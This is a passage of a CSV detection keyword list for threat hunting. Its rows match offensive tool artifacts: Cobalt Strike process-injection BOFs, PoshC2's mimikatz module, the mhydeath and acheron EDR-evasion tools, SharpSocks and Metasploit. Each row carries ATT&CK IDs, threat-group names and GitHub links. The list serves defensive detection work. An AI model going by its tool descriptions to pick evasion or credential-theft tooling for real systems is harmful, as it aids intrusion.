TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/DLL_Imports_BOF,1,1,N/A,10,10,80,10,2021-10-28T18:07:09Z,2021-10-27T21:02:44Z -*process_imports_api *.exe*,offensive_tool_keyword,cobaltstrike,A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/DLL_Imports_BOF,1,0,N/A,10,10,80,10,2021-10-28T18:07:09Z,2021-10-27T21:02:44Z -*process_inject_allocator*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*process_inject_bof_allocator*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*process_inject_bof_reuse_memory*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*process_inject_execute*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*process_inject_min_alloc*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*process_inject_startrwx*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*Process_Inject_Struct*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,1,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*process_inject_transform_x*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*process_inject_userwx*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*process_killer.exe*,offensive_tool_keyword,mhydeath,Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.,T1562.001,TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/zer0condition/mhydeath,1,1,N/A,10,3,251,47,2023-08-22T08:01:04Z,2023-08-22T07:15:36Z -*process_memdump.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*process_mimikatz*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*process_protection_enum *,offensive_tool_keyword,cobaltstrike,A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Process_Protection_Level_BOF,1,0,N/A,10,10,48,7,2021-08-30T00:18:57Z,2021-08-29T23:08:22Z -*process_protection_enum*.dmp*,offensive_tool_keyword,cobaltstrike,A BOF port of the research of @thefLinkk and @codewhitesec,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com//EspressoCake/HandleKatz_BOF,1,1,N/A,10,,N/A,,, -*process_protection_enum.*,offensive_tool_keyword,cobaltstrike,A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Process_Protection_Level_BOF,1,1,N/A,10,10,48,7,2021-08-30T00:18:57Z,2021-08-29T23:08:22Z -*Process_Protection_Level_BOF.*,offensive_tool_keyword,cobaltstrike,A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Process_Protection_Level_BOF,1,1,N/A,10,10,48,7,2021-08-30T00:18:57Z,2021-08-29T23:08:22Z -*Process_Protection_Level_BOF/*,offensive_tool_keyword,cobaltstrike,A Syscall-only BOF file intended to grab process protection attributes. limited to a handful that Red Team operators and pentesters would commonly be interested in.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Process_Protection_Level_BOF,1,1,N/A,10,10,48,7,2021-08-30T00:18:57Z,2021-08-29T23:08:22Z -*process_snapshot.exe*,offensive_tool_keyword,acheron,indirect syscalls for AV/EDR evasion in Go assembly,T1055.012 - T1059.001 - T1059.003,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/f1zm0/acheron,1,1,N/A,N/A,3,244,31,2023-06-13T19:20:33Z,2023-04-07T10:40:33Z -*ProcessCommandChannelImplantMessage*,offensive_tool_keyword,SharpSocks,Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell,T1090 - T1021.001,TA0002,N/A,N/A,C2,https://github.com/nettitude/SharpSocks,1,1,N/A,10,10,453,89,2023-03-15T19:19:30Z,2017-11-10T13:29:08Z -*ProcessDestroy.x64*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*ProcessDestroy.x64.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*ProcessDestroy.x86*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*ProcessDestroy.x86.*,offensive_tool_keyword,cobaltstrike,Cobaltstrike Bofs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z 